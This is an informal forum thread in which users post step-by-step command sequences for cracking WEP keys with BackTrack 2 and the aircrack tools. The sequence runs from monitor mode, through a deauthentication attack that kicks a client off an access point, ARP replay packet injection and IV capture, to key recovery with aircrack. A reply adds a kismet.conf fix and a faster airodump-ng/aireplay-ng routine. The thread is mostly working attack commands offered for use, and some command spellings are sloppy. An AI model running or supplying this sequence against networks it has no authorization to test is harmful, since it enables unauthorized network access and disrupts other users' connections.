BackTrack 2 wep key cracking
I have got back track 2 and I was confused on eather the syntax of the commands them self or if i just diddent configure everything correctly. So to help others Here is what i have, I run iwconfig and set the wireless card to listen (iwconfig wlan0 mode moniter) next i need to run kismet (when i run kismet it telles me i need to configure it! and to refer to the .doc i did not know how/ or where it was but thats ok ther is an alternitave, airodump. so i get it all setup (airodump wlan0 dump channel 1)
-new window- now i need to inject the packets so i can increase the IV's rapidly. so i (aireplay -0 10 -1 "mac adress of AP" -c "client mac adress" wlan0) {this was to kick the other user off of the ap and re authenticate}
-new window- now to the injection (aireplay -3 -b "mac adress of AP" -h "client mac adress" -x 500 wlan0)
now the numbers should increase after a while 500,000 iv's or so later time to crack them
-new window- (aircrack -a 1 -b "mac adress of ap" dump.ivs) this tells air crack that it should be trying to break the key here is another method to use that is sometimes faster (aircrack -a 1 -i 1 -n 64 -m "mac aderss of client" -b "mac adress of ap" dump.ivs)
and now you should get a wep key jot it down on a peice of paper reboot to windows and enter the key twice with out the : and now you should be in!
(if anyone sees anything i need to add or if there is an error please let me know or, edit it thx Exidous) PS: I need a sig
for you to use kismet on backtrack you have to edit kismet's conf sudo kedit /usr/local/etc/kismet.conf
find the line, source=none,none,none which is source=drivername,devicename,namegiven for example mine is because i use the patched ipwraw drivers: source=ipw3945,wifi0,Intel
others for example are: source=ipw3945,eth1,intel source=orinoco,eth1,kismet etc.
then kismet will run, and run happy. Lucky you having a card and drivers that inject and enter monitor mode nicely. Few are so fortunate.
hmm..
I've never had to get 500K IV's to crack a wep, usually just 50K; I usually go about it kinda like this:
markupAirmon-ng start rausb0
airodump-ng rasub0
i find the target AP, and a client that is on, then i use client's mac address in an arp attack
then i restart airodump to capture the packets i want
markupairodump-ng --channel 6 -w dumpfile rausb0
then i start the arp attack
aireplay-ng -3 -b <AP MAC> -h <AP Client's MAC> rausb0
i wait to 50K iv's then i crack it in less than a few seconds..